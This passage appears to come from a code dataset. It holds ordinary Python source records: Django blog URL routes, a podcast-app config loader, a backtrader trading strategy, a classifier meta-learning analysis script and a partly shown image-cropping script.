{"api_name": "apidaze.script.Speak", "line_number": 58, "usage_type": "call"}, {"api_name": "apidaze.script.Echo", "line_number": 59, "usage_type": "call"}, {"api_name": "apidaze.script.Builder", "line_number": 65, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 66, "usage_type": "call"}, {"api_name": "apidaze.script.Conference", "line_number": 67, "usage_type": "call"}, {"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 72, "usage_type": "name"}, {"api_name": "http.server.HTTPServer", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "111933488", "text": "from django.conf.urls import url\n# Import the views file from root dir (.)\nfrom . import views\n\nurlpatterns = [\n url(r'^post_list/', views.post_list, name='post_list'),\n # The URL should contain the word post and /\n # The URL will then transfer a pk variable to the view, pk = primary key\n # The pk variable can only be a number between [0-9] with one or more digits (+)\n url(r'^post/(?P[0-9]+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P[0-9]+)/edit/$', views.post_edit, name='post_edit'),\n # Add about.html view URL\n url(r'^about', views.about, name='about'),\n # Add projects.html view URL\n url(r'^projects', views.projects, name='projects'),\n url(r'^$', views.landing_page, name='landing_page'),\n]\n", "sub_path": "blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 793, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "646687639", "text": "import sys\nimport os\nimport json\n\n\nclass ConfigException(Exception):\n def __init__(self, msg):\n super(ConfigException, self).__init__(\"Config exception: %s\" % (msg))\n\n\nclass Config:\n instance = None\n\n def parse_config(config_file=None):\n if not Config.instance:\n Config.instance = Config(config_file)\n\n return Config.instance\n\n def __init__(self, args):\n if args.config:\n config = args.config\n else:\n config_file = \"youtube-podcaster.json\"\n\n if sys.platform == \"linux\" and not hasattr(sys, \"real_prefix\"):\n config = \"/etc/%s\" % (config_file)\n else:\n config = \"%s/etc/%s\" % (sys.prefix, config_file)\n\n if not os.path.isfile(config):\n raise ConfigException(\"%s not found\" % (config))\n\n try:\n config = json.load(open(config))\n except json.decoder.JSONDecodeError as e:\n raise ConfigException(\"%s is not valid json: %s\" % (\n config, str(e)))\n\n try:\n self.server = config[\"server\"]\n self.youtube = config[\"youtube\"]\n self.podcasts = config[\"podcasts\"]\n self.downloads = config[\"downloads\"]\n except KeyError as e:\n raise ConfigException(\"Missing %s-section in %s\" % (\n str(e), config))\n\n for arg, value in vars(args).items():\n if not value:\n continue\n\n if arg == \"interface\":\n self.server[\"interface\"] = value\n elif arg == \"port\":\n self.server[\"port\"] = value\n elif arg == \"apikey\":\n self.youtube[\"api-key\"] = value\n\n def get_server_address(self):\n interface = str(self.server[\"interface\"])\n port = int(self.server[\"port\"])\n return interface, port\n\n# vim: set ts=8 sw=4 tw=0 et :\n", "sub_path": "youtube_podcaster/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1931, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.platform", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.prefix", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 36, "usage_type": "attribute"}]} +{"seq_id": "344852844", "text": "\nimport backtrader as bt\n\nfrom python.base_strategy import BaseStrategy\n\nclass AS002Strategy(BaseStrategy):\n\n params = (\n ('high_period', None),\n ('low_period', None),\n )\n\n def __init__(self): \n self.close = self.datas[0].close\n self.high = self.datas[0].high\n self.low = self.datas[0].low\n\n self.highest_high = bt.indicators.Highest(self.high, period=self.params.high_period, plot=False)\n self.lowest_low = bt.indicators.Lowest(self.low, period=self.params.low_period, plot=False)\n self.macd_hist = bt.indicators.MACDHisto(self.close, plot=False).histo\n \n self.order = None \n\n def next(self): \n\n # Check if an order is pending\n if self.order:\n return\n \n buy_condition = (self.macd_hist[0] > 0) and (self.close[0] > self.highest_high[-1])\n sell_condition = (self.macd_hist[0] < 0) or (self.close[0] < self.lowest_low[-1])\n\n # Check if we are in the market\n if not self.position:\n \n if buy_condition:\n self.order = self.buy()\n \n else: \n \n if sell_condition:\n self.order = self.sell() \n\n", "sub_path": "python/AS002.py", "file_name": "AS002.py", "file_ext": "py", "file_size_in_byte": 1309, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "python.base_strategy.BaseStrategy", "line_number": 6, "usage_type": "name"}, {"api_name": "backtrader.indicators.Highest", "line_number": 18, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 18, "usage_type": "attribute"}, {"api_name": "backtrader.indicators.Lowest", "line_number": 19, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 19, "usage_type": "attribute"}, {"api_name": "backtrader.indicators.MACDHisto", "line_number": 20, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "441220191", "text": "import os\nimport pandas as pd\nimport numpy as np\nimport json\n# import matplotlib.pyplot as plt\n\nfrom sklearn import svm, linear_model, discriminant_analysis, neighbors\nfrom sklearn import tree, naive_bayes, ensemble, neural_network, gaussian_process\nfrom sklearn.model_selection import cross_validate, KFold, train_test_split\nfrom sklearn import metrics\nfrom sklearn import preprocessing\n\nfrom scipy.io import arff as arff_io\nfrom pymfe.mfe import MFE\n\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.under_sampling import RandomUnderSampler\n\nfrom NoiseFiltersPy.HARF import HARF\nfrom NoiseFiltersPy.ENN import ENN\n\nimport constants\nfrom config import config\nfrom Default import Default\nfrom Random import Random\nfrom meta_db.db.DBHelper import DBHelper\n\nfrom R_Model import *\n# Importing utils from R\nfrom rpy2.robjects.packages import importr\nimport rpy2.robjects.packages as rpackages\nfrom rpy2.robjects.vectors import StrVector\nfrom rpy2.robjects.packages import SignatureTranslatedAnonymousPackage\n\n# For Formulae\nfrom rpy2.robjects import IntVector, Formula\n\n# For Pandas\nimport rpy2.robjects as ro\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects import numpy2ri\nfrom rpy2.robjects.conversion import localconverter\n\n# Getting R functions\nutils = importr(\"utils\")\nutils.chooseCRANmirror(ind=1)\n\n# Geting packages\npackages = (\"reshape2\", \"e1071\", \"kknn\", \"randomForest\", \"C50\", \"rpart\", \"neuralnet\")\nto_install = [pack for pack in packages if not rpackages.isinstalled(pack)]\nif to_install:\n utils.install_packages(StrVector(to_install))\n\ne1071 = importr(\"e1071\")\nkknn = importr(\"kknn\")\nrandomForest = importr(\"randomForest\")\nc50 = importr(\"C50\")\nrpart = importr(\"rpart\")\nneuralnet = importr(\"neuralnet\")\n\nRANDOM_STATE = 73\nnp.random.seed(RANDOM_STATE)\n\nSCORE = \"balanced_accuracy_mean\"\nSCORE_RAW = \"balanced_accuracy\"\n\ngrey_palette = ['rgb(208, 209, 211)',\n 'rgb(185, 191, 193)',\n 'rgb(137, 149, 147)',\n 'rgb(44, 54, 60)',\n 'rgb(3, 3, 3)'\n ]\n\npprocs = {\n \"RandomUnder\": RandomUnderSampler(random_state = RANDOM_STATE).fit_resample,\n \"SMOTE\": SMOTE(random_state = RANDOM_STATE).fit_resample,\n \"HARF\": HARF(seed = RANDOM_STATE),\n \"ENN\": ENN()\n}\ndef preprocessor(name, values, target):\n if name in [\"RandomUnder\", \"SMOTE\"]:\n return pprocs[name](values, target)\n else:\n filter = pprocs[name](values, target)\n return (filter.cleanData, filter.cleanClasses)\n\ndef real_scores(values, target):\n clf_models = {}\n svm_clf = svm.SVC(gamma = \"auto\").fit(values, target )\n clf_models[\"svm\"] = svm_clf # Actually not needed, the cv does the training again\n lg_clf = linear_model.LogisticRegression(random_state = RANDOM_STATE, solver = 'lbfgs').fit(values, target )\n clf_models[\"logistic_regression\"] = lg_clf\n lineardisc_clf = discriminant_analysis.LinearDiscriminantAnalysis().fit(values, target )\n clf_models[\"linear_discriminant\"] = lineardisc_clf\n neigh_clf = neighbors.KNeighborsClassifier().fit(values, target)\n clf_models[\"kneighbors\"] = neigh_clf\n dectree_clf = tree.DecisionTreeClassifier(random_state = RANDOM_STATE).fit(values, target )\n clf_models[\"decision_tree\"] = dectree_clf\n gaussian_clf = naive_bayes.GaussianNB().fit(values, target )\n clf_models[\"gaussian_nb\"] = gaussian_clf\n random_forest_clf = ensemble.RandomForestClassifier(n_estimators = 100).fit(values, target )\n clf_models[\"random_forest\"] = random_forest_clf\n gradient_boost_clf = ensemble.GradientBoostingClassifier().fit(values, target )\n clf_models[\"gradient_boosting\"] = gradient_boost_clf\n results = {}\n for clf in clf_models.keys():\n cv_results = cross_validate(clf_models[clf], values, target, cv = 10, scoring = SCORE_RAW)\n results[\"None+{}\".format(clf)] = np.mean(cv_results[\"test_score\"])\n\n for pproc in pprocs.keys():\n try:\n new_values, new_target = preprocessor(pproc, values, target)\n except:\n for clf in clf_models.keys():\n results[\"{}+{}\".format(pproc, clf)] = 0\n continue\n\n for clf in clf_models.keys():\n try:\n cv_results = cross_validate(clf_models[clf], new_values, new_target, cv = 10, scoring = SCORE_RAW)\n except ValueError:\n cv_results = cross_validate(clf_models[clf], values, target, cv = 10, scoring = SCORE_RAW)\n results[\"{}+{}\".format(pproc, clf)] = np.mean(cv_results[\"test_score\"])\n return results\n\ntranslator = {\n \"gaussian_nb\": \"GNB\",\n \"random_forest\": \"RF\",\n \"randomForest\": \"RF\",\n \"random\": \"Random\",\n \"default\": \"Default\"\n}\n\ndb = DBHelper()\nmfe = MFE()\nle = preprocessing.LabelEncoder()\n\n\ndef deal_dataset(name):\n data = arff_io.loadarff(config[\"dataset\"][\"folder\"] + name + \".arff\")\n data = pd.DataFrame(data[0])\n target = data[\"class\"].values\n if target.dtype == np.object:\n le.fit(target)\n target = le.transform(target)\n values = data.drop(\"class\", axis = 1)\n # Check if any is a string, some classifiers only deals with numeric data\n for dtype, key in zip(values.dtypes, values.keys()):\n if dtype == np.object:\n le.fit(values[key].values)\n values[key] = le.transform(values[key].values)\n values = values.values\n return values, target\n\ndef calculate_metafeature(name, values, target):\n mfe.fit(values, target)\n try:\n ft = mfe.extract(supress_warnings = True)\n except AttributeError:\n mfe.fit(values.astype(float), target)\n ft = mfe.extract(supress_warnings = True)\n labels = np.array(ft[0])\n results = np.array(ft[1])\n nan_columns = np.isnan(results)\n not_nan = np.invert(nan_columns)\n # Adding name to the list\n labels = [\"name\"] + labels[not_nan].tolist()\n results = [name] + results[not_nan].tolist()\n for indx, result in enumerate(results):\n if isinstance(result, complex):\n results[indx] = result.real\n cols = []\n for type in labels:\n if type == \"int\":\n type = \"intt\"\n cols.append(type.replace(\".\", \"_\"))\n results = np.array(results).reshape((1, len(results)))\n results = pd.DataFrame(results, columns = cols)\n return results\n\nmetadata = pd.DataFrame(db.get_all_metadata(), columns = db.metadata_columns()).drop(\"id\", axis = 1)\nmodels = pd.DataFrame(db.get_all_models(), columns = db.models_columns()).drop(\"id\", axis = 1)\ncombinations = pd.DataFrame(db.get_all_combinations(), columns = db.combinations_columns())\npreperformance = pd.DataFrame(db.get_all_preperformance(), columns = db.preperformance_columns()).drop(\"id\", axis = 1)\n# Not null preperformance\npreperformance = preperformance[~preperformance.isnull().any(axis = 1)]\npreperformance = pd.merge(preperformance, combinations, left_on = \"combination_id\", right_on = \"id\").drop([\"combination_id\", \"id\", \"num_preprocesses\"], axis = 1)\n\nmodels = models.rename(columns = {\"model\": \"classifier\"})\nmodels[\"preprocesses\"] = \"None\"\nscores = pd.concat([models, preperformance], sort = False)\nscores = scores[scores.classifier != \"neural_network\"]\nmodels = models[models.classifier != \"neural_network\"]\n\nmetadata_means = {feature: np.mean(metadata[feature]) for feature in metadata.columns if feature != \"name\"}\nmetadata.fillna(value = metadata_means, inplace = True)\n\ndata = pd.merge(metadata, scores, on = \"name\")\ndata = data[data.preprocesses.isin(constants.PRE_PROCESSES + [\"None\"]) & data.classifier.isin(constants.CLASSIFIERS)]\n\nmeta_means = {feature: np.mean(metadata[feature]) for feature in metadata.columns if feature != \"name\"}\n\nif not os.path.exists(\"analysis/plots\"):\n os.makedirs(\"analysis/plots\")\nif not os.path.exists(\"analysis/plots/base_analysis\"):\n os.makedirs(\"analysis/plots/base_analysis\")\n\nmean_scores = []\nstd_scores = []\nfor score in constants.CLASSIFIERS_SCORES:\n mean_scores.append(score + \"_mean\")\n std_scores.append(score + \"_std\")\n\nreg_models = {}\nreg_models[\"ann\"] = lambda: R_Model(neuralnet.neuralnet)\nreg_models[\"cart\"] = lambda: R_Model(rpart.rpart)\nreg_models[\"randomForest\"] = lambda: R_Model(randomForest.randomForest)\nreg_models[\"svm\"] = lambda: SVR()\nreg_models[\"dwnn\"] = lambda: KNN()\nreg_models[\"random\"] = lambda: Random(random_seed = RANDOM_STATE)\nreg_models[\"default\"] = lambda: Default()\n\n# Function to get only datasets with all results (combinations)\ndef filter_dataset(database):\n datasets_filtered = []\n for dataset in database.name.unique():\n split = database[database.name == dataset]\n keep = True\n for clf in constants.CLASSIFIERS:\n for pp in constants.PRE_PROCESSES + ['None']:\n if len(split[(split.classifier == clf) & (split.preprocesses == pp)]) < 1:\n keep = False\n if keep:\n datasets_filtered.append(dataset)\n return datasets_filtered\n\ndatasets = pd.Series(filter_dataset(data))\n\nresults = {}\n\nresults[\"pp_wins\"] = {}\nresults[\"clf_wins\"] = {}\nresults[\"wins\"] = {}\n\nnum_datasets = {}\n\nTURNS = 5\n\nregressor_type = \"randomForest\"\nresults[\"pp_wins\"][regressor_type] = [0] * TURNS\nresults[\"clf_wins\"][regressor_type] = [0] * TURNS\nresults[\"wins\"][regressor_type] = [0] * TURNS\n\nnum_datasets[regressor_type] = [0] * TURNS\n\ntrain_dt, test_dt = train_test_split(datasets, test_size = 0.1, random_state = RANDOM_STATE, shuffle = True)\ntargets = data[data.name.isin(train_dt)]\ntrained_reg = {}\n\nfor clf in constants.CLASSIFIERS:\n for preprocess in (constants.PRE_PROCESSES + ['None']):\n trained_reg[\"{}+{}\".format(preprocess, clf)] = reg_models[regressor_type]()\n target = targets.query(\"classifier == '{}' and preprocesses == '{}'\".format(clf, preprocess))\n meta_target = target.drop([\"name\", \"classifier\", \"preprocesses\", *mean_scores, *std_scores], axis = 1)\n label_target = target[SCORE].values\n trained_reg[\"{}+{}\".format(preprocess, clf)].fit(meta_target, label_target)\n\ntests = data[data.name.isin(test_dt)]\nfor test_dataset in tests.name.unique():\n print(test_dataset)\n dt_values, dt_target = deal_dataset(test_dataset)\n\n dataset_info = tests[tests.name == test_dataset]\n meta_data = dataset_info.drop(\n [\"name\", \"classifier\", \"preprocesses\", *mean_scores, *std_scores],\n axis = 1\n ).iloc[[0]]\n\n for turn in range(TURNS):\n num_datasets[regressor_type][turn] += 1\n print(\"MAKING TURNS\")\n reg_results = {}\n for model in trained_reg:\n reg_results[model] = trained_reg[model].predict(meta_data)\n max_predicted = max(reg_results.keys(), key = (lambda key: reg_results[key]))\n pp_pred, clf_pred = max_predicted.split(\"+\")\n if turn == 0:\n print(\"TURN 0\")\n true_max = dataset_info[dataset_info[SCORE] == dataset_info[SCORE].max()]\n pp_maxes = [entry.preprocesses for indx, entry in true_max.iterrows()]\n clf_maxes = [entry.classifier for indx, entry in true_max.iterrows()]\n score_pred = dataset_info[(dataset_info.preprocesses == pp_pred) & (dataset_info.classifier == clf_pred)][SCORE]\n results[\"wins\"][regressor_type][turn] += 1 if ((pp_pred in pp_maxes) and (clf_pred in clf_maxes)) else 0\n else:\n print(\"RECURSION TURN\")\n true_max = max(clf_scores, key = (lambda pp_clf: clf_scores[pp_clf]))\n max_comb_value = clf_scores[true_max]\n true_maxes = [comb for comb in clf_scores if clf_scores[comb] == max_comb_value]\n pp_maxes = []; clf_maxes = []\n for max_v in true_maxes:\n pp, clf = max_v.split(\"+\")\n pp_maxes.append(pp); clf_maxes.append(clf)\n results[\"wins\"][regressor_type][turn] += 1 if (max_predicted in true_maxes) else 0\n\n results[\"pp_wins\"][regressor_type][turn] += 1 if (pp_pred in pp_maxes) else 0\n results[\"clf_wins\"][regressor_type][turn] += 1 if (clf_pred in clf_maxes) else 0\n\n if (pp_pred == \"None\") or not (pp_pred in pp_maxes):\n print(\"END PP\")\n break\n else:\n try:\n dt_values, dt_target = preprocessor(pp_pred, dt_values, dt_target)\n meta_data = calculate_metafeature(test_dataset, dt_values, dt_target)\n except:\n break\n print(\"HERE!\")\n meta_results = {}\n for indx, col in enumerate(dataset_info.columns.drop([\"name\", \"classifier\", \"preprocesses\", *mean_scores, *std_scores])):\n if col not in meta_data.columns:\n meta_results[col] = meta_means[col]\n else:\n meta_results[col] = float(meta_data[col])\n meta_data = pd.DataFrame.from_dict([meta_results])\n clf_scores = real_scores(dt_values, dt_target)\n print(\"END TURN\")\n print(\"END END\")\n\nprint(results)\nprint(num_datasets)\nwith open(\"analysis/plots/recursion/\" + SCORE + \".rf.{}.json\".format(RANDOM_STATE), \"w\") as fd:\n json.dump(results, fd, indent = 4)\nwith open(\"analysis/plots/recursion/\" + SCORE + \"__numdatasets.rf.{}.json\".format(RANDOM_STATE), \"w\") as fd:\n json.dump(num_datasets, fd, indent = 4)\n", "sub_path": "analysis/recursion_analysis_random_forest.py", "file_name": "recursion_analysis_random_forest.py", "file_ext": "py", "file_size_in_byte": 13206, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rpy2.robjects.packages.importr", "line_number": 45, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.isinstalled", "line_number": 50, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages", "line_number": 50, "usage_type": "name"}, {"api_name": "rpy2.robjects.vectors.StrVector", "line_number": 52, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 54, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 55, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 56, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 57, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 58, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "imblearn.under_sampling.RandomUnderSampler", "line_number": 75, "usage_type": "call"}, {"api_name": "imblearn.over_sampling.SMOTE", "line_number": 76, "usage_type": "call"}, {"api_name": "NoiseFiltersPy.HARF.HARF", "line_number": 77, "usage_type": "call"}, {"api_name": "NoiseFiltersPy.ENN.ENN", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 89, "usage_type": "name"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 91, "usage_type": "name"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis", "line_number": 93, "usage_type": "name"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.neighbors", "line_number": 95, "usage_type": "name"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 97, "usage_type": "name"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes", "line_number": 99, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 101, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 101, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 103, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "meta_db.db.DBHelper.DBHelper", "line_number": 134, "usage_type": "call"}, {"api_name": "pymfe.mfe.MFE", "line_number": 135, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 136, "usage_type": "name"}, {"api_name": "scipy.io.arff.loadarff", "line_number": 140, "usage_type": "call"}, {"api_name": "scipy.io.arff", "line_number": 140, "usage_type": "name"}, {"api_name": "config.config", "line_number": 140, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.object", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.object", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.invert", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 177, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 181, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 183, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 184, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 198, "usage_type": "call"}, {"api_name": "constants.PRE_PROCESSES", "line_number": 199, "usage_type": "attribute"}, {"api_name": "constants.CLASSIFIERS", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 206, "usage_type": "call"}, {"api_name": "constants.CLASSIFIERS_SCORES", "line_number": 210, "usage_type": "attribute"}, {"api_name": "Random.Random", "line_number": 220, "usage_type": "call"}, {"api_name": "Default.Default", "line_number": 221, "usage_type": "call"}, {"api_name": "constants.CLASSIFIERS", "line_number": 229, "usage_type": "attribute"}, {"api_name": "constants.PRE_PROCESSES", "line_number": 230, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 237, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 256, "usage_type": "call"}, {"api_name": "constants.CLASSIFIERS", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.PRE_PROCESSES", "line_number": 261, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 324, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 324, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 332, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 334, "usage_type": "call"}]} +{"seq_id": "260542699", "text": "import numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nget_ipython().run_line_magic('matplotlib', 'inline')\r\nimport skimage\r\nfrom numpy import matlib as mb\r\nimport imageio\r\nimport cv2\r\nimport imageio as iio\r\nfrom skimage import filters\r\nfrom skimage.color import rgb2gray # only needed for incorrectly saved images\r\nfrom skimage.measure import regionprops\r\nfrom scipy import ndimage\r\n\r\n# Load training images and labels\r\nx_train_list = np.load('train_images.npy', encoding='bytes')\r\ntrain_labels = pd.read_csv('train_labels.csv')\r\nx_test_list = np.load('test_images.npy', encoding='bytes')\r\n\r\nx_train = np.zeros((x_train_list[:,1].shape[0], x_train_list[0,1].shape[0]))\r\nx_test = np.zeros((x_test_list[:,1].shape[0], x_test_list[0,1].shape[0]))\r\n\r\n\r\n# Class information\r\nnb_classes = 31\r\nlook_up = {'0': 'sink', '1': 'pear', '2': 'moustache', '3': 'nose', '4': 'skateboard',\r\n '5': 'penguin', '6': 'peanut', '7': 'skull', '8':'panda', '9': 'paintbrush',\r\n '10': 'nail', '11': 'apple', '12': 'rifle', '13': 'mug', '14': 'sailboat',\r\n '15': 'pineapple', '16': 'spoon', '17': 'rabbit', '18': 'shovel', '19': 'rollerskates',\r\n '20': 'screwdriver', '21': 'scorpion', '22': 'rhinoceros', '23': 'pool', '24':'octagon',\r\n '25':'pillow', '26': 'parrot', '27': 'squiggle', '28': 'mouth', '29': 'empty', '30': 'pencil'}\r\n\r\n\r\n\r\n# Set up X (training/validation set and test set)\r\nfor idx, x in enumerate(x_train_list[:, 1]):\r\n x_train[idx] = x\r\n \r\nfor idx, x in enumerate(x_test_list[:, 1]):\r\n x_test[idx] = x\r\n\r\nprint(x_test.shape, x_train.shape)\r\n\r\n# Set up y arrays (both binary and non-binary)\r\ny_categories = []\r\nfor target_category in train_labels['Category']:\r\n y_categories.append(target_category)\r\n \r\nnb_examples = len(y_categories)\r\ny_train = np.zeros((nb_examples, nb_classes))\r\ny_train_non_bin = np.zeros((nb_examples,))\r\n\r\n# Look through the category list; if the category matches an index from the lookup table,\r\n# we'll assign that index to the corresponding location in the training y-vector\r\nfor idx, category in enumerate(y_categories):\r\n for index, image in look_up.items(): \r\n if image == category:\r\n y_train[idx, int(index)] = 1\r\n y_train_non_bin[idx] = int(index)\r\n\r\n# Shapes should be nb_examples x nb_features and nb_examples x nb_classes for x and y\r\n\r\n\r\nx_train /= 255\r\nx_test /= 255\r\n\r\n#center_ind_list_row = []\r\n#center_ind_list_col = []\r\n#for i in range(x_train.shape[0]):\r\n# img = (x_train[i].reshape(100,100))\r\n# center_ind_list_col.append((ndimage.measurements.center_of_mass(img)[0]))\r\n# center_ind_list_row.append((ndimage.measurements.center_of_mass(img)[1]))\r\n#\r\n#center_ind_list_row = np.array(center_ind_list_row)\r\n#center_ind_list_col = np.array(center_ind_list_col)\r\n#\r\n#for j in range(10):\r\n# img = (x_train[j].reshape(100,100))\r\n# plt.imshow(img)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# centre_ind = ndimage.measurements.center_of_mass(img)\r\n# \r\n# size_of_crop = 30\r\n# centre_row = int(round(centre_ind[1]))\r\n# centre_col = int(round(centre_ind[0]))\r\n# #img_crop = img[46-20:46+20,39-20:39+20]\r\n# img_crop = img[(centre_row-size_of_crop):(centre_row+size_of_crop),(centre_col-size_of_crop):(centre_col+size_of_crop)]\r\n# plt.imshow(img_crop)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print (\"IMAGE # = \",j)\r\n#i = 125\r\nx_train_crop = []\r\nfor i in range(x_train.shape[0]):\r\n img = (x_train[i].reshape(100,100))\r\n plt.imshow(img)\r\n plt.axis(\"off\")\r\n plt.show()\r\n size_of_crop = 20\r\n x = 0\r\n y = 0\r\n x_crop = 20\r\n y_crop = 20\r\n number = 0\r\n all_crop_list = []\r\n for row in range(5):\r\n for col in range(5):\r\n #centre_ind = ndimage.measurements.center_of_mass(img, index = [1,2])\r\n # centre_row = int(round(centre_ind[1]))\r\n # centre_col = int(round(centre_ind[0]))\r\n #img_crop = img[46-20:46+20,39-20:39+20]\r\n img_crop = img[x:x_crop,y:y_crop]\r\n all_crop_list.append((np.average(img_crop.reshape((img_crop.shape[0]*img_crop.shape[0]),), axis=0),number,x,x_crop,y,y_crop))\r\n# plt.imshow(img_crop)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print(\"size = \", x ,\":\", x_crop,\",\",y ,\":\", y_crop)\r\n y = y + size_of_crop\r\n y_crop = y_crop + size_of_crop\r\n# print ('Number = ', number)\r\n number = number + 1\r\n \r\n x = x + size_of_crop\r\n x_crop = x_crop + size_of_crop\r\n y = 0\r\n y_crop = 20\r\n \r\n all_crop_list = np.array(all_crop_list)\r\n max_avg_index = np.where(all_crop_list == np.max(all_crop_list[:,0]))[0][0]\r\n# print (max_avg_index)\r\n img = (x_train[i].reshape(100,100))\r\n row1 = int(all_crop_list[max_avg_index][2]-size_of_crop)\r\n row2 = int(all_crop_list[max_avg_index][3]+size_of_crop)\r\n col1 = int(all_crop_list[max_avg_index][4]-size_of_crop)\r\n col2 = int(all_crop_list[max_avg_index][5]+size_of_crop)\r\n \r\n size_of_crop = 10\r\n if 